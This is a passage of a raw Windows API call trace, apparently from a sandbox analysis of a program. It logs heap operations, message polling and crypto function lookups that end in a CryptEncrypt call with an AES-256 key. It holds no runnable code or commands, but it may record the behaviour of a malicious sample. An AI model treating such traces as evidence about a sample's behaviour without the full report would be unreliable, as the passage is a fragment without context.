dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04b8 | out: hHeap=0x1780000) returned 1 [0082.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.677] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0418 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0260 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0082.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37a0 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0082.678] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2f00 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f00 | out: hHeap=0x1780000) returned 1 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0082.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0260 | out: hHeap=0x1780000) returned 1 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0260 [0082.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2e90 [0082.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0082.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0082.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e90 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ef0 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0260 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d80 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f10 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d30 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e60 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e60 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e70 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e40 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2da0 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f10 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d80 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f20 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0082.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0082.681] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e40 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d40 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0082.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ef0 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d90 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e40 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0710 | out: hHeap=0x1780000) returned 1 [0082.682] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2b40, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2b40*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e90 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b18 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e10 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a88 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e10 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b00 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b18 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2eb0 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3950 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3ab8 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e60 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3950 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d70 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d60 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e80 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e00 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2df0 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d06c0 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.683] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dc0 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.684] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d60 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f00 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.684] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ee0 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e80 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2de0 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e70 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d60 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d50 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0260 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41acc80 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38c0 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ea0 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0082.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0082.685] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3ab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.685] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0x157d3, dwBufLen=0x0 | out: pbData=0x0*, 